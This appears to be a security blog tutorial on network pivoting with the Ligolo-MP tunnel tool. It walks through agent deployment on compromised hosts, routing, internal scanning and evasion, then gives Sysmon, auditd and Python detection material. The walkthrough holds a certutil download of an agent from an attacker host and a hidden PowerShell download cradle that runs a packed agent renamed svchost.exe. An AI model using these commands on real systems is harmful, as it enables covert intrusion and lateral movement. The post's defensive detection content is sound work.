Mastering Network Pivoting with Ligolo-MP: The Ultimate Red Team Tunnel for Internal Recon + Video


Introduction:

Network pivoting transforms a compromised endpoint into a launchpad for deeper internal network exploitation, bypassing firewalls and routing restrictions. Ligolo-MP elevates this technique by creating a VPN-like TUN interface with mTLS encryption, eliminating the need for legacy SOCKS proxies or manual port forwarding. This guide delivers a complete, hands-on walkthrough for deploying Ligolo-MP to pivot through internal subnets, enabling seamless lateral movement and reconnaissance.

Learning Objectives:

  • Deploy Ligolo-MP on Linux attacker machines and compromised Windows/Linux hosts for stealthy network pivoting.
  • Configure TUN interfaces, route traffic, and scan internal subnets using native tools like Nmap without proxy modifications.
  • Implement certificate-based authentication (mTLS) and multi‑session tunneling for collaborative red team operations.

You Should Know:

1. Understanding Ligolo‑MP Architecture and Installation

Ligolo‑MP operates by establishing an encrypted tunnel between your attacker machine (proxy server) and a compromised host (agent). The agent creates a TUN interface on the target network, making the attacker’s system behave as if it physically resides inside the internal subnet. No SOCKS or port forwarding is required—traffic is routed via the tunnel at the IP level.

Step‑by‑step installation on attacker machine (Linux):

# Clone the repository and build from source (requires Go)
sudo apt install golang-go git -y
git clone https://github.com/nicocha30/ligolo-mp.git
cd ligolo-mp
go build -o ligolo-mp cmd/proxy/main.go
go build -o agent cmd/agent/main.go

# Alternatively, download precompiled binaries from releases
wget https://github.com/nicocha30/ligolo-mp/releases/download/v0.5.0/ligolo-mp_proxy_linux_amd64.tar.gz
tar -xzf ligolo-mp_proxy_linux_amd64.tar.gz

Windows agent installation (transfer the agent binary to compromised Windows host):

# On attacker machine, serve agent via Python HTTP server
python3 -m http.server 8000

# On Windows target (after obtaining shell)
certutil -urlcache -f http://<attacker_ip>:8000/agent.exe agent.exe

2. Generating mTLS Certificates and Starting the Proxy Server

Ligolo‑MP uses mutual TLS for encrypted communication and agent authentication. Self‑signed certificates are acceptable for testing; for operational security, use a trusted CA.

Step‑by‑step certificate generation and proxy startup:

# Generate CA key and certificate
openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 365 -key ca.key -subj "/CN=Ligolo-CA" -out ca.crt

# Generate server certificate
openssl genrsa -out server.key 2048
openssl req -new -key server.key -subj "/CN=ligolo-server" -out server.csr
openssl x509 -req -in server.csr -CA ca.crt -CAkey ca.key -CAcreateserial -days 365 -out server.crt

# Start the proxy on attacker machine (listening on port 443 for agent connections)
sudo ./ligolo-mp -proxy -laddr 0.0.0.0:443 -ca ca.crt -cert server.crt -key server.key

On Windows (if using PowerShell for proxy):

.\ligolo-mp.exe -proxy -laddr 0.0.0.0:443 -ca ca.crt -cert server.crt -key server.key

3. Connecting the Agent from a Compromised Host

After transferring the agent binary to the compromised machine (Linux or Windows), run it to establish a reverse tunnel to your attacker proxy. The agent will automatically create a TUN interface on the target.

For Linux agent:

# On compromised Linux host
sudo ./agent -connect <attacker_ip>:443 -ca ca.crt

For Windows agent (requires Administrator privileges for TUN interface creation):

agent.exe -connect <attacker_ip>:443 -ca ca.crt

Once connected, the proxy console will show the agent’s IP (e.g., 10.10.10.1). Use the `session` command to interact:

# Inside proxy CLI
session 1
ifconfig  # Shows agent's virtual TUN interface and accessible subnets

4. Routing Traffic and Performing Internal Network Scanning

With an active agent session, the attacker machine must add routes to forward traffic through the agent’s TUN interface. Ligolo‑MP automatically creates a TUN interface on the attacker side (usually ligolo0). Use native IP routing commands to send internal subnet traffic into the tunnel.

Step‑by‑step routing configuration (Linux attacker):

# Identify the tunnel interface (e.g., ligolo0)
ip link show ligolo0

# Add route to the internal subnet accessible via the agent (e.g., 172.16.5.0/24)
sudo ip route add 172.16.5.0/24 dev ligolo0

# Verify routing table
ip route show | grep ligolo0

Now run Nmap directly against internal IPs:

nmap -sT -Pn 172.16.5.10 -p 445,3389,22  # Traffic goes through the tunnel

For Windows attacker (rare, but if using WSL or native Windows tunnel):

# Using route command on Windows
route ADD 172.16.5.0 MASK 255.255.255.0 <attacker_ligolo0_IP> METRIC 1
# Verify with `route print`

To scan multiple hosts, use toolchains without proxy environment variables—Ligolo‑MP routes at the network layer.

5. Multi‑Player Pivoting and Concurrent Tunnels

Ligolo‑MP supports simultaneous agent connections, enabling a team of attackers to pivot through different compromised hosts. Each agent operates independently, and the proxy can manage multiple sessions.

Step‑by‑step for collaborative engagement:

# On proxy console, list active sessions
sessions

# Switch between sessions
session 2
ifconfig  # View different internal network

# Route additional subnets for session 2
sudo ip route add 192.168.10.0/24 dev ligolo0  # Traffic for that subnet goes to current active session

# To isolate traffic per session, use policy routing with Linux marks
sudo ip rule add from 10.10.10.0/24 table 100
sudo ip route add 172.16.5.0/24 dev ligolo0 table 100

This lets a single Nmap run target several internal subnets, either by switching the active session or by pinning each subnet to a session with the policy routing above.

6. Bypassing Firewalls and Limiting Detection

Ligolo‑MP’s encrypted mTLS traffic on port 443 (or any custom port) blends with HTTPS, evading basic egress filtering. However, defenders may monitor for unusual TUN interface creation or routing changes. To reduce detection:

  • Use a proxy listener on common ports (443, 80, 53) and mimic legitimate TLS handshakes.
  • Restrict ICMP and aggressive scanning through the tunnel to avoid triggering IDS signatures.
  • Implement traffic shaping: use `tc` (Linux) to limit packet rates.
  • For Windows agents, obfuscate the binary using packers (e.g., UPX) and rename `agent.exe` to a legitimate process name.

Step‑by‑step obfuscation:

# On attacker machine, compress the agent
upx --best -o agent_upx.exe agent.exe

# Use PowerShell download cradle for stealth
echo 'Invoke-WebRequest -Uri "http://<attacker_ip>:8080/agent_upx.exe" -OutFile "$env:temp\svchost.exe"; Start-Process "$env:temp\svchost.exe" -ArgumentList "-connect <attacker_ip>:443 -ca ca.crt" -WindowStyle Hidden' | iex

7. Mitigation and Detection for Defenders

Blue teams can detect Ligolo‑MP pivoting by monitoring for unexpected TUN/TAP interfaces on endpoints, anomalous process creation of network agents, and outbound TLS connections to suspicious IPs. Implement the following countermeasures:

  • Enforce endpoint detection and response (EDR) rules that flag creation of virtual network adapters by non‑administrative processes.
  • Monitor Windows event logs for netsh, route add, or `certutil -urlcache` downloads.
  • Use Zeek (Bro) to inspect TLS certificate fields—self‑signed certificates with unusual CNs (e.g., “Ligolo‑CA”) are indicators.
  • Deploy network flow analysis for sudden route changes or ICMP echo requests originating from unexpected internal hosts.

Step‑by‑step detection with Sysmon (Windows):

<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <!-- Either string on its own marks an agent-style launch -->
        <CommandLine condition="contains">-connect</CommandLine>
        <CommandLine condition="contains">ligolo</CommandLine>
      </ProcessCreate>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="include">
        <!-- Both must match: without the "and" group every connection to 443 would be logged -->
        <Rule groupRelation="and">
          <DestinationPort>443</DestinationPort>
          <Image condition="end with">agent.exe</Image>
        </Rule>
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

Linux defenders can audit routing changes using `auditd`:

auditctl -w /proc/sys/net/ipv4/route -p wa -k route_change
ausearch -k route_change -i

Note that `ip route add` modifies the routing table through a netlink socket rather than by writing under /proc, and auditd file watches on procfs are unreliable, so this rule mainly catches sysctl-style writes. For dependable coverage, also watch the `ip` and `route` binaries for execution (a `-w` rule with `-p x`, keyed the same way) and review the resulting EXECVE records with `ausearch`.
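As an added example (not code from the post or from the Ligolo-MP project), the following Python applies the endpoint and TLS indicators listed in this section to constructed Sysmon-style process-create records and Zeek-style certificate records; the field names, sample paths and addresses are assumptions made for the example.

```python
import re

# Constructed Sysmon-style Event ID 1 records (only Image and CommandLine).
PROCESS_EVENTS = [
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "CommandLine": "svchost.exe -connect 203.0.113.5:443 -ca ca.crt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://203.0.113.5:8000/agent.exe agent.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
]

# Constructed Zeek-style TLS records (subject/issuer as in x509.log; "dst" is assumed).
TLS_EVENTS = [
    {"dst": "203.0.113.5:443", "subject": "CN=ligolo-server", "issuer": "CN=Ligolo-CA"},
    {"dst": "198.51.100.7:443", "subject": "CN=www.example.com", "issuer": "CN=Example Public CA"},
    {"dst": "203.0.113.9:443", "subject": "CN=vpn-test", "issuer": "CN=vpn-test"},
]

AGENT_CMD = re.compile(r"-connect\s+\S+:\d+\b.*-ca\s+\S+", re.I)
CERTUTIL_DL = re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)

def check_process(ev):
    """Reasons a process-create record matches the post's endpoint indicators."""
    cmd, image = ev.get("CommandLine", ""), ev.get("Image", "")
    reasons = []
    if AGENT_CMD.search(cmd) or "ligolo" in cmd.lower():
        reasons.append("agent-style command line (-connect host:port with -ca, or 'ligolo')")
    if CERTUTIL_DL.search(cmd):
        reasons.append("certutil -urlcache download")
    # A system binary name launched from outside System32 points to a renamed payload.
    if image.lower().endswith(r"\svchost.exe") and r"\system32\svchost.exe" not in image.lower():
        reasons.append("svchost.exe running outside System32")
    return reasons

def check_tls(ev):
    """Reasons a TLS record matches the post's certificate indicators."""
    subject, issuer = ev["subject"], ev["issuer"]
    reasons = []
    if subject == issuer:
        reasons.append("self-signed certificate")
    if "ligolo" in (subject + issuer).lower():
        reasons.append("Ligolo CN in certificate")
    return reasons

def scan(process_events=PROCESS_EVENTS, tls_events=TLS_EVENTS):
    """Return (source, key, reasons) for every record that trips an indicator."""
    findings = [("process", ev["Image"], r) for ev in process_events if (r := check_process(ev))]
    findings += [("tls", ev["dst"], r) for ev in tls_events if (r := check_tls(ev))]
    return findings
```

Run `scan()` on real exported events by mapping your Sysmon and Zeek fields onto the same keys; the benign System32 svchost.exe and the publicly issued certificate produce no findings.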

What Undercode Say:

  • Ligolo‑MP revolutionizes red team pivoting by eliminating SOCKS complexity and providing native VPN‑like routing, making internal reconnaissance faster and stealthier.
  • The tool’s mTLS encryption and multi‑session support empower advanced lateral movement, but defenders must evolve to monitor for virtual interface creation and outbound TLS anomalies.
  • Adversaries using Ligolo‑MP shift the burden to network defenders: traditional proxy detection fails, requiring behavioral analytics on endpoint routing modifications and process behavior.

Prediction:

As zero‑trust architectures push micro‑segmentation, tools like Ligolo‑MP will drive defenders toward mandatory egress TLS inspection and behavioral baselining of network stack changes. Expect red teams to integrate Ligolo‑MP with C2 frameworks (Cobalt Strike, Mythic) and adopt domain fronting to further camouflage mTLS tunnels. Meanwhile, defensive AI models will soon flag anomalously added routes or virtual TUN adapters in real time, sparking an arms race between agile pivoting and ML‑based anomaly detection.


Reported By: Network Pivoting – Hackers Feeds